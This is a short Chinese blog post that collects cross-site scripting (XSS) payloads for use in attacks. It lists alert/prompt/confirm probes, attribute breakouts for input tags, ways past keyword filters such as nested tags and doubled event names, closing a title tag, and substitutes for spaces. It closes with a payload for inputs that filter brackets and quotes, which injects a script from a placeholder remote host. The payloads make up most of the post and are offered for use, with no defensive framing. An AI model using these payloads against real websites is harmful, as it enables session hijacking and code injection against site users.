美文网首页
XSS攻击脚本

XSS攻击脚本

作者: IT胖 | 来源:发表于2019-06-10 18:12 被阅读0次

    1、常用脚本

    &lt;img src=x o<x>nerror=a<x>lert(/xss/)&gt;
    "/>
    <script>alert(1)</script>
    "><script src=www.baidu.com>
    
    <img src=x onerror=prompt(1);>
    <img src="x" onclick="alert(1)">    (点击)
    <img/**/src=1 onerror=confirm(1)>
    <img src=# onerror=confirm(1)>  或/>
    <img src=1 onerror=console.log(alert(1));//
    
    在<input>标签中可尝试如下脚本
    xxxxx" onmouseover="alert(123)"
    xxxxx" onFocus="alert(1)"
    xxxxx" onClick="alert(1)">
    xxxxx");alert(1);//    (当参数在<script></script>之间时,此脚本可有效,注意闭合前面的括号等)
    

    2、关键字过滤<script>,onerror

    改为<scr<script>ipt>,oneonerrorrror

    3、部分反射型xss存在于title中,可闭合</title>

    如:https://www.cnblogs.com/superye/p/7343676.html?utm_source=itdadao&utm_medium=referral

    4、空格被编码或过滤时,可使用/**/或<>变相伪造成空格
    5、<input>中过滤了<>,(),''

    构造本地payload:
    
            xxxxxxxxxx" name=javasCript:alert%281%29 autofocus onfocus=location=this.name xx
    
    构造payload获取:
    
            xxxxxxxxxx" name=javasCript:s=document.createElement%28"sCript"%29;s.src="//xxxxx.js";document.body.appendChild%28s%29 autofocus onfocus=location=this.name xx
    

    其中%28 %29为()的URL编码,参考:https://xsspt.com/index.php?do=binfo&id=2016-0195079

    相关文章

      网友评论

          本文标题:XSS攻击脚本

          本文链接:https://www.haomeiwen.com/subject/kqjyzqtx.html